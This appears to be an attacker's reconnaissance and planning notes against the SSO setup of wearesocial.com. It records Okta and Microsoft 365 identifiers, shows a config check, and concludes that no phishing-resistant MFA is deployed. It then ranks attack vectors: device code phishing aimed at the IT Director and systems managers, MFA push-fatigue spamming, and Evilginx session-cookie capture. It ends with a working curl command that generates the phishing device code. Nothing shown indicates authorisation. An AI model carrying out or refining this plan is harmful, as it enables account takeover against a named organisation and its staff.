# Authentication & SSO Findings - wearesocial.com
# Date: 2026-01-05

================================================================================
OKTA CONFIGURATION
================================================================================
Okta URL: https://wearesocial.okta.com
Org ID: 00okjju0hfYCCNZDHURH
Pipeline: v1 (legacy)

Settings:
  pssoEnabled: false        ← FastPass DISABLED (vulnerable)
  desktopMFAEnabled: false  ← Desktop MFA DISABLED
  itpEnabled: false         ← Identity Threat Protection DISABLED

Verdict: WEAK CONFIGURATION - Device code phishing will work

================================================================================
PHISHING RESISTANCE CHECK - METHODOLOGY
================================================================================

## How We Verified No Phishing Resistance

### Step 1: Check Okta Organization Config
Command:
  curl -s "https://wearesocial.okta.com/.well-known/okta-organization" | jq .

Response:
  {
    "id": "00okjju0hfYCCNZDHURH",
    "pipeline": "v1",
    "settings": {
      "pssoEnabled": false,
      "desktopMFAEnabled": false,
      "itpEnabled": false
    }
  }

### Step 2: Interpret Results

| Setting | Value | Meaning |
|---------|-------|---------|  
| pssoEnabled | false | Okta FastPass (FIDO2/WebAuthn) NOT enabled |
| desktopMFAEnabled | false | Device-bound MFA NOT required |
| itpEnabled | false | Identity Threat Protection NOT active |
| pipeline | v1 | Legacy auth pipeline (less secure than v2) |

### Step 3: Conclusion

NO PHISHING-RESISTANT MFA DEPLOYED:
- ❌ No Okta FastPass (FIDO2/WebAuthn)
- ❌ No hardware security keys required
- ❌ No device trust/certificate-based auth
- ❌ No Identity Threat Protection (behavioral analysis)
- ✅ Likely using standard Okta Verify push or TOTP

### Step 4: Attack Implications

1. DEVICE CODE PHISHING WILL WORK
   - User enters code on real Microsoft/Okta URL
   - Completes MFA themselves (push/TOTP)
   - Attacker receives valid session token
   - No phishing-resistant controls to stop this

2. MFA FATIGUE ATTACKS POSSIBLE
   - If using Okta Verify push
   - Spam push notifications until user approves
   - No anomaly detection (itpEnabled: false)

3. REAL-TIME PHISHING (EVILGINX) POSSIBLE
   - Can proxy auth in real-time
   - Capture session cookies
   - No device binding to prevent replay

================================================================================
MICROSOFT 365 FEDERATION
================================================================================
M365 Tenant: c444fffe-2181-46e8-ad79-6da1c731c973
Federation: ENABLED (to Okta)
Auth URL: https://wearesocial.okta.com/app/office365/exk1fg0rzkbsnwqR31d8/sso/wsfed/passive
Brand Name: We Are Social

Flow:
  1. User → microsoft.com/devicelogin
  2. Microsoft → redirects to Okta
  3. User authenticates via Okta MFA
  4. Attacker receives M365 token

================================================================================
EMAIL PROVIDER
================================================================================
Provider: Google Workspace
MX Records:
  10 aspmx.l.google.com
  20 alt1.aspmx.l.google.com
  20 alt2.aspmx.l.google.com
  30 aspmx2.googlemail.com
  30 aspmx3.googlemail.com
  30 aspmx4.googlemail.com
  30 aspmx5.googlemail.com

================================================================================
ATTACK VECTORS
================================================================================
1. Microsoft Device Code Phishing (RECOMMENDED)
   - Target: IT Director, Systems Managers
   - Flow: Real Microsoft URL → Okta federation → MFA bypass
   - Tool: TokenTactics, manual curl

2. Okta Push Fatigue
   - Backup if device code fails
   - Spam MFA push notifications

3. Legacy Auth Endpoints
   - Check for IMAP/SMTP basic auth on Google

================================================================================
DEVICE CODE GENERATION
================================================================================
curl -s -X POST "https://login.microsoftonline.com/wearesocial.com/oauth2/v2.0/devicecode" \
  -d "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c" \
  -d "scope=https://graph.microsoft.com/.default offline_access"
